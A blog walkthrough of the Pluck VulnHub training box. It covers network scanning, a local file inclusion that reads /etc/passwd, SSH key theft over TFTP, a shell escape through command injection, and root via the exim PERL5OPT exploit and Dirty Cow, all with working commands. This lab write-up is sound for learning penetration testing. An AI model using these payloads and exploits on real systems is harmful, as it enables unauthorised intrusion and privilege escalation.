Pluck - VulnHub Box

-
Pluck - VulnHub Box

Box Information

Name: Pluck - 1
Release: 11 MAR 2017
Creator: Ryan Oberto
User Level Difficulty: Easy
Root Level Difficulty: Intermediate

Prerequisites

None

Description

This box focuses mostly on enumeration. Most of the attack vectors found were due to poor system administration practices present on the box. Finding these vulnerabilities will allow the attack to gain an initial foot-hold.

Initial Access is mostly accomplished by the use of scanning tools. There is some understanding how a private and public key pair work, though this will be covered during the wall-through.

Privilege Escalation is a bit more complex, using code injection to gain root access; however, no previous coding knowledge will be required to understand & practice this attack. This walk-through will cover how the vulnerability works and what is happening in the back-end.

Methodologies Used

These are the methodologies I used to gain initial access & privilege escalate to root.

  1. Enumeration
    • Port Enumeration
    • HTTP Service Enumeration
  2. Vulnerability Scanning
    • TFTP
    • Pdmenu
  3. Public & Private Key Use
    • SSH
  4. Code Injection
    • Pdmenu

Reconnaissance Phase

To start, find the ip address of the box on the network. This can be accomplished in many different ways. Here, I will show two methods. If you are already familiar with finding a box on a network, the automatic method is quick and easy. If you are NOT familiar with finding a box on a network, I recommend the manual method.

Automatic Method

This method requires no additional steps other than booting the box.

Spoiler - Automatic Steps
Steps Screen Shots
  1. Boot up the virtual machine
  2. Look at the login page. The IP should be displayed at the top.

Manual Method

This method will show you how to scan your network and find the box. Recommended for newer PenTesters.

Spoiler - Manual Steps
Steps Notes
  1. Boot up the lab.
  2. On the attacker box, scan the victim's network
    • (syntax) root@kali: nmap -F [ip].[ip].[ip].0/24
    • (example) root@kali:# nmap -F 192.168.0.0/24
  • The ".0/24" tells nmap that you want to scan the entire /24 range. What this means, is it will scan all IPs from .1-255
  • The report from this scan will vary depending on what is currently connected to the network you scanned. Meaning, there could be anywhere from 1 to 255 returns.

Now that the IP address of the box has been established. Use NMAP to discover more information about the box. Using the TCP & Version flags will give a more detailed report.

Spoiler - NMAP Detailed Scan
Steps Screen Shots
  • (syntax) root@kali: nmap -sV -sT [ip]
  • (example) root@kali: nmap -sV -sT 192.168.0.30

Scanning Phase

With the ports visible from the victim box, deeper scanning can commence. The first port that pops to mind to gain additional information on is the HTTP Port 80. Typically, a lot of information can be discovered on web servers. Hidden pages, local files, usernames, passwords, and personal identification information (PII) are typical findings.

Nikto tool is one of the standard HTTP discovery tools used during the scanning phase.

Spoiler - Nikto Scan
Steps Screen Shots
  • (syntax) nikto -h [http-url]
  • (example) nikto -h 192.168.0.30

Right away, a vulnerability has been discovered from the scan. The report indicates, "The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host." We can use this vulnerability to possibly gather user information. Add the reported vulnerability to the site's url.

Spoiler - Local File Inclusion (LFI)
Steps Screen Shots
  • (syntax) http://url/index.php?page=file_location/file_name.file_type
  • (example) http://192.168.0.30/index.php?page=../../../../../../../etc/passwd

A lot of information has been discovered viewing this Box's PASSWD file. Usernames & even a script location!

Spoiler - PASSWD Findings
Usernames Script Location:
  • Bob
  • Paul
  • Peter
  • /usr/local/scripts/backup.sh

Use the LFI vulnerability to read this script file.

Spoiler - Backup Script Findings
LFI Path Screenshots
  • (syntax) http://url/index.php?page=[filePath]/[filename].[fileExtension]
  • (example) http://192.168.0.30/index.php?page=../../../../../../../usr/local/scripts/backup.sh

This script file has a lot of useful information. It appears that this script creates a backup zip drive of files on the local computer. Maybe it contains some desired files. Additionally, it appears that this file is accessible VIA TFTP.

Gaining Access Phase

With the information provided from the LFI vulnerability. It appears that there is a TFTP service running on this box. While the service was not reported within the nmap scan, this doesn't mean that there isn't a TFTP server listening on this box. Attempt to connect to the service.

Spoiler - TFTP Connection
Connection String Screenshots
  • (example) root@kali:~/Desktop/VulnHub/Pluck# tftp 192.168.0.30

Attempt a TFTP GET request for the tar file. If a successful connection has been established, the file will be downloaded. Note, you can also use wireshark to see a report of the network traffic4.

Spoiler - TFTP and Wireshark commands
Commands Screenshots
  • (syntax tftp) tftp> get [fileLocation]/[fileName].[fileType]
  • (example tftp) tftp> get backup.tar
  • (syntax wireshark) capture filter: ip.dst == [ip]
  • (example wireshark) capture filter: ip.dst == 192.168.0.30

After successfully downloading the tar file, unzip the files and see if there are any interesting files within.

Spoiler - TAR contents
Keys' Location Screenshots
  • (SSH keys)  /home/paul/keys

SSH, typically on PORT 22, is a service that allows a user to remotely connect to a computer. During the NMAP scan of the box, port 22 was open to the public; however, we did not have a password or a private key to use for credentials. One of the flags SSH has, allows a user to include a private key when attempting to connect to the port. Using the private keys (e.g. the keys without the .pub extension) might give us access to the box. Take note of the user that these keys were located in. Also, not every key may work. Just because the first one didn't, attempt them all.

Spoiler - SSH Private Key Use
SSH Command Screenshots
  • (syntax) root@kali: ssh -i [key] [user]@[ip]
  • (example) root@kali: ssh -i id_key4 paul@192.168.0.30

Once the proper key is used, a connection will be made. Upon connecting, a new service is given to the user. It appears to be a UI and is called "Pdmenu". The functionality appears that it might be a UI for shell commands executables. To fully understand this vulnerability, more research can be found at Escaping Limited Linux Shells.

A few of the options allows a user to manually select a directory or even edit a specific file. The "Edit file" opens up the Vi Text Editor. More importantly, what appears to be happening is selecting "Edit file" sends a console command of "vi [filename]".

Note the standard functionality of a console window does allow user to issue multiple commands with the ";" as a separator. More specifically, the ";" closes a previous command and allows a user to issue another command following the ";".

Spoiler - Escape Limited Shell Command
Escape Limited Shell Command Screenshots
  • (syntax) command; new_command
  • (example) vi; /bin/bash

Since the "Edit file" options seems to do a vi and then appends a file name to the command before sending it to the console service, then possibly adding a ";" followed by a desired command may work. Attempting the above example puts us into the VI editor with a filename of "". Exit the Vi editor (:q!) and see what happens.

Spoiler - Escape Limited Shell (cont.)
Escape Limited Shell Command Screenshots
  1. Select "Edit file"
  2. Enter "; /bin/bash"
  3. Within the Vi Editor, ":q!" and hit enter
 (example) paul@pluck:~$ ifconfig

This method is called Code Injection. What is specifically happening is that the system is receiving the entire command "vi ; /bin/bash". It executes the first command "vi ", which is why the Vi Editor opens. Once the the editor is closed, this completes the first command sent to the system. The system then performs the second command "/bin/bash"; which, is why bash is opened after closing the editor.

Privilege Escalation

Now, it is time to privilege escalate. Privilege Escalation is the idea of obtaining system access higher than the current user. For example, USER rights to ADMIN rights. The end goal is to obtain the highest permissions on the box as possible.

There are many different methods to start enumerating the system to find the vulnerable vector which will be used to obtain higher permissions.

Example of gathering system information on a Linux box.

Console Commands Screenshots
  • (example) paul@pluck:/tmp$ uname -a

    • Another userful system level command is to obtain a list of files which, when executed, are execute as the owner and not the user. We might be lucky and find a file which the user "root" is the owner and the current user has access to.

    Spoiler - List of Owner Executable Files
    Console Commands Screenshots
    • (example) find / -perm -u=s -type f 2>/dev/null

    Method 1

    A quick Google search for known vulnerabilities for this service & version number finds that it is vulnerable to a privilege escalation exploit. Exploit-DB: 39549

    The Proof of Concept shows the steps to gain root level system commands. First, we need to start up the PERL5DB shell.

    Spoiler - Exploit-DB: 39549
    Console Commands Screenshots
    •  (example) paul@pluck:/tmp$ PERL5OPT="-d/dev/null" /usr/exim/bin/exim -ps paul@localhost
    • __DB<1>__ p system("id");

    It appears that we can run root level commands. Start up a bash shell and we'll have a fully interactive shell.

    Spoiler - Obtaining ROOT Shell VIA Exploit-DB: 39549
    Console Commands Screenshots
    • (example)  DB<2> p system("/bin/bash");
    • root@pluck:/tmp#

    Method 2

    I have personally found another privilege escalation vulnerability that works. However, this was done VIA trial and error. Typically, searching for exploits with the system information would report any that work. During my testing, I found that all the vulnerabilities that would come up on search engines did NOT work. Though, I did find one exploit which works that does not come up on searches. It is known as the Dirty Cow exploit. Exploit-DB: 40616

    This exploit is fairly easy to execute. Build the source code into an executable on the attacker's box. This is done using the GCC tool.

    Spoiler - GCC Build
    Console Commands Screenshots
    • (syntax) gcc [ExploitName].c -o [OutputFileName] -pthread
    • (example) gcc 40616.c -o cowroot -pthread

    Upload the file to the victim's box. This is done by opening a WebServer on the attacker's box and using a WGET command on the victim's box to obtain the file. Change the permissions of the file so that PAUL can run the executable. Run the Executable.

    Spoiler - ROOT Privilege Escalation Exploit
    Console Commands Screenshots
    1. Host the file
      • (syntax) python -m SimpleHTTPServer [port]
      • (example) python -m SimpleHTTPServer 80
    2. Download the file
      • (syntax) wget [url]/[filename].[filetype]
      • (example) wget 192.168.0.30/cowroot
    3. Change the permissions
      •  (syntax) chmod [permissions] [filename].[filetype]
      • (example) chmod 777 cowroot
    4. Execute the attack
      • (example) paul@pluck:/tmp$ ./cowroot

    All that is left is to obtain the flag. The flag is located in the root directory.

    Console Commands Screenshots
  • (example) cat /root/flag.txt

    • Closing

    This concludes the walk-through of Pluck.

    Comments

    Post a Comment

    Popular posts from this blog

    Lin.Security: 1 - VulnHub Box

    -
    Image
    LinSecurity: 1 VulnHub Box Box Information Name: Lin.Security: 1 Release: 11 JUL 2018 Creator: In.security User Level Difficulty: Easy & Intermediate Root Level Difficulty: Easy & Intermediate Table of Contents Prerequisites Description Enumeration Bob Insecurity Susan Peter Prerequisites The following topics are beneficial in understanding how this box can be exploited. Entry Level Knowledge JOHN THE RIPPER Network File Share (NFS) Scripting SSH-Keygen Description This box primarily focuses on poor System Administration practices. It includes lessons where the user already has access to the box and must privilege escalate. It also includes lessons on gaining user level access remotely. It cover...
    Read more